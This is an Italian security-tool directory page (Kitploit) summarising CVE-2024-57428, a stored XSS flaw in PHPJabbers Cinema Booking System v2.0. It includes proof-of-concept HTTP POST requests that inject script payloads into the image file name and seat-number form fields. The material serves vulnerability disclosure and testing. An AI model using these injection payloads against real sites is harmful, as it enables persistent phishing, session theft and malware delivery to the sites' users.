Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-57428 — CVE-2024-57428: PHPJabbers Cinema Booking System v2.0 soffre di XSS memorizzato, permettendo iniezione JavaScript persistente per attacchi di phishing e malware. | Kitploit
Strumenti/GitHubGitHub/ahrixia/cve-2024-57428
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPhishingPenetration Testing
GitHubahrixia/cve-2024-57428

CVE-2024-57428

CVE-2024-57428: PHPJabbers Cinema Booking System v2.0 soffre di XSS memorizzato, permettendo iniezione JavaScript persistente per attacchi di phishing e malware.

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-57428

Una vulnerabilità di cross-site scripting (XSS) memorizzato in PHPJabbers Cinema Booking System v2.0 esiste a causa dell'input non sanificato nei campi di caricamento file (event_img, seat_maps) e nelle configurazioni dei numeri dei posti (number[new_X] in pjActionCreate). Gli attaccanti possono iniettare JavaScript persistente, portando a phishing, iniezione di malware e dirottamento di sessione.

Parametro vulnerabile: event_img e nome file di seat_maps

Impatto:

Lo XSS memorizzato è più grave dello XSS riflesso, poiché colpisce tutti gli utenti che accedono al contenuto iniettato. Potrebbe essere sfruttato per attacchi di phishing persistenti, furto di sessione o iniezione di malware su un'ampia base di utenti.

Exploit - Prova di Concetto (POC)

Cross-Site Scripting (XSS) Memorizzato

XSS Memorizzato tramite Caricamento File

Payload: \">

root@kitploit:~
POST /CinemaBookingDev/index.php?controller=pjAdminEvents&action=pjActionCreate HTTP/1.1
Host: 127.0.0.1
Content-Length: 38611
[SNIP]


------WebKitFormBoundaryKOsvqJhAGpZAt33t
Content-Disposition: form-data; name="event_img"; filename="luffy.jpg\">"
Content-Type: image/jpeg

NUMERO DEL POSTO IN SALA CINEMA

Payload: "><script>alert(x)</script>

root@kitploit:~
POST /CinemaBookingDev/index.php?controller=pjAdminVenues&action=pjActionCreate HTTP/1.1
Host: 127.0.0.1
Content-Length: 1812
[SNIP]


------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="seats_count"

11
------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="number[new_1]"

1"><script>alert(1)</script>1
------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="number[new_2]"

2"><script>alert(2)</script>2
Scarica lo strumento